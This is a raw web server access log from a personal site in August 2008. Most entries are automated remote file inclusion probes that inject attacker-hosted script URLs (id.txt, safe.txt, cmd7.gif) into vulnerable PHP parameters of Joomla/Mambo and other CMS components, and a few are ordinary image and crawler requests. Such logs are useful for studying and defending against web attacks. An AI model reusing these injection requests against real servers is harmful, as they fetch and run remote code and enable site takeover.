69.93.217.235 - - [28/Aug/2008:10:34:59 -0700] "GET /logs/access_080218.log//index.php?option=com_registration&task=register/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.93.217.235 - - [28/Aug/2008:10:35:01 -0700] "GET //index.php?option=com_registration&task=register/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:10:35:04 -0700] "GET /logs/access_080714.log///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:10:35:10 -0700] "GET /logs/access_080131.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:10:35:10 -0700] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:10:35:11 -0700] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:35:11 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-141_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
74.55.113.226 - - [28/Aug/2008:10:35:26 -0700] "GET /logs/access_080413.log/index2.php?page=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/Aug/2008:10:35:27 -0700] "GET /index2.php?page=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/Aug/2008:10:35:28 -0700] "GET /logs/index2.php?page=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [28/Aug/2008:10:35:33 -0700] "GET /logs/access_080811.log/phphtml.php?htmlclass_path=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [28/Aug/2008:10:35:33 -0700] "GET /phphtml.php?htmlclass_path=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [28/Aug/2008:10:35:33 -0700] "GET /logs/phphtml.php?htmlclass_path=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:10:35:49 -0700] "GET /bikes/dteel/EQ2/Screenshots/?D=A HTTP/1.0" 200 7100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.135.38.88 - - [28/Aug/2008:10:35:50 -0700] "GET /logs/access_080218.log//index.php?option=com_registration&task=register/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.38.88 - - [28/Aug/2008:10:35:50 -0700] "GET //index.php?option=com_registration&task=register/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.38.88 - - [28/Aug/2008:10:35:52 -0700] "GET /logs//index.php?option=com_registration&task=register/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:10:35:52 -0700] "GET /logs/access_080324.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:35:54 -0700] "GET /logs/access_080121.log/errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:35:55 -0700] "GET /errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:35:55 -0700] "GET /logs/errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.34.172 - - [28/Aug/2008:10:35:56 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:10:36:02 -0700] "GET /logs/access_080724.log///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:36:07 -0700] "GET /logs/access_071222.log/errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:36:18 -0700] "GET /logs/access_080801.log//include/admin.lib.inc.php?site_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:36:18 -0700] "GET //include/admin.lib.inc.php?site_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:36:19 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:36:19 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:36:19 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:36:19 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:36:25 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.122.161.78 - - [28/Aug/2008:10:36:26 -0700] "GET /logs/access_080821.log///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
89.111.176.116 - - [28/Aug/2008:10:36:33 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/Aug/2008:10:36:34 -0700] "GET /index2.php?page=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/Aug/2008:10:36:40 -0700] "GET /logs/access_080413.log/index2.php?page=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/Aug/2008:10:36:40 -0700] "GET /index2.php?page=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/Aug/2008:10:36:40 -0700] "GET /logs/index2.php?page=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.161.78 - - [28/Aug/2008:10:36:40 -0700] "GET /logs/access_080518.log///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
222.122.161.78 - - [28/Aug/2008:10:36:40 -0700] "GET /logs///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
222.122.161.78 - - [28/Aug/2008:10:36:42 -0700] "GET ///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 200 85347 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
69.93.217.235 - - [28/Aug/2008:10:36:45 -0700] "GET /logs/access_080718.log//index.php?option=com_registration&task=register/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.122.161.78 - - [28/Aug/2008:10:36:48 -0700] "GET /logs/access_080821.log///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:36:48 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0131.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:36:52 -0700] "GET /logs/access_080718.log//include/admin.lib.inc.php?site_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:36:54 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-076_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
85.25.3.10 - - [28/Aug/2008:10:37:07 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
85.25.3.10 - - [28/Aug/2008:10:37:07 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
66.79.163.110 - - [28/Aug/2008:10:37:20 -0700] "GET /logs/access_080106.log/send_reminders.php?includedir=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.163.110 - - [28/Aug/2008:10:37:20 -0700] "GET /send_reminders.php?includedir=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.163.110 - - [28/Aug/2008:10:37:21 -0700] "GET /logs/access_080111.log/send_reminders.php?includedir=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.163.110 - - [28/Aug/2008:10:37:21 -0700] "GET /logs/send_reminders.php?includedir=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.113.226 - - [28/Aug/2008:10:37:27 -0700] "GET /logs/access_080428.log/index2.php?page=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.38.88 - - [28/Aug/2008:10:37:43 -0700] "GET /logs/access_080718.log//index.php?option=com_registration&task=register/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.113.226 - - [28/Aug/2008:10:37:48 -0700] "GET /index2.php?page=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/Aug/2008:10:37:48 -0700] "GET /index2.php?page=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.80.16 - - [28/Aug/2008:10:37:54 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://peru.americautos.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
213.165.80.16 - - [28/Aug/2008:10:37:55 -0700] "GET //e404.php?DOCUMENT_ROOT=http://peru.americautos.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:37:59 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0165.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
67.18.208.106 - - [28/Aug/2008:10:38:05 -0700] "GET /logs/access_080113.log/errors.php?error=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:10:38:05 -0700] "GET /errors.php?error=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:10:38:05 -0700] "GET /logs/errors.php?error=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:38:20 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-044_2.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
72.9.248.162 - - [28/Aug/2008:10:38:28 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:10:38:41 -0700] "GET /logs/access_080122.log/errors.php?error=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:10:39:06 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:10:39:08 -0700] "GET /logs/access_080810.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.57.24 - - [28/Aug/2008:10:39:16 -0700] "GET /logs/access_080617.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.bodabagtribe.net/.../image.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.57.24 - - [28/Aug/2008:10:39:17 -0700] "GET /logs/access_080715.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.bodabagtribe.net/.../image.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/Aug/2008:10:39:18 -0700] "GET /logs/access_080428.log/index2.php?page=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:39:41 -0700] "GET /logs/access_080810.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:39:41 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.98.192.98 - - [28/Aug/2008:10:39:44 -0700] "GET /logs/access_080218.log//index.php?option=com_registration&task=register/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.192.98 - - [28/Aug/2008:10:39:45 -0700] "GET //index.php?option=com_registration&task=register/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.192.98 - - [28/Aug/2008:10:39:45 -0700] "GET /logs//index.php?option=com_registration&task=register/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.108.191 - - [28/Aug/2008:10:39:49 -0700] "GET /megumi/minamigrad2k8/IMG_1605.CR2 HTTP/1.1" 200 196608 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:40:07 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-028.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:40:08 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:10:40:13 -0700] "GET /logs/access_080329.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:10:40:14 -0700] "GET /logs/access_080329.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:40:30 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0169.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:40:41 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:40:41 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:40:42 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:40:42 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:40:46 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-021_3.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:40:51 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0068.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
69.27.110.65 - - [28/Aug/2008:10:40:53 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.27.110.65 - - [28/Aug/2008:10:40:53 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.27.110.65 - - [28/Aug/2008:10:40:59 -0700] "GET /logs/access_080723.log//e404.php?DOCUMENT_ROOT=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:41:07 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0077.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
216.55.159.47 - - [28/Aug/2008:10:41:11 -0700] "GET /logs/?mosConfig_absolute_path=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 200 62571 "-" "libwww-perl/5.803" "www.dmulk.com"
216.55.159.47 - - [28/Aug/2008:10:41:12 -0700] "GET /?mosConfig_absolute_path=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 200 85219 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:41:13 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:41:13 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:10:41:20 -0700] "GET /logs/access_080715.log/test.php?page=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:41:26 -0700] "GET /logs/access_080803.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:10:41:31 -0700] "GET /logs/access_080820.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.30 - - [28/Aug/2008:10:41:31 -0700] "GET /bikes/dteel/CreSTOC08/ HTTP/1.1" 200 6025 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:10:41:32 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:10:41:32 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:42:02 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:42:02 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:42:07 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:42:08 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:42:09 -0700] "GET //include/admin.lib.inc.php?site_path=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:42:10 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0151.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:42:18 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0014.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
85.214.57.24 - - [28/Aug/2008:10:42:25 -0700] "GET /logs/access_080630.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.bodabagtribe.net/.../image.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:42:26 -0700] "GET /errors.php?error=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.48.34.189 - - [28/Aug/2008:10:42:49 -0700] "GET /logs/access_080820.log/?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.34.189 - - [28/Aug/2008:10:42:49 -0700] "GET /?mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 85195 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:42:50 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0015.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
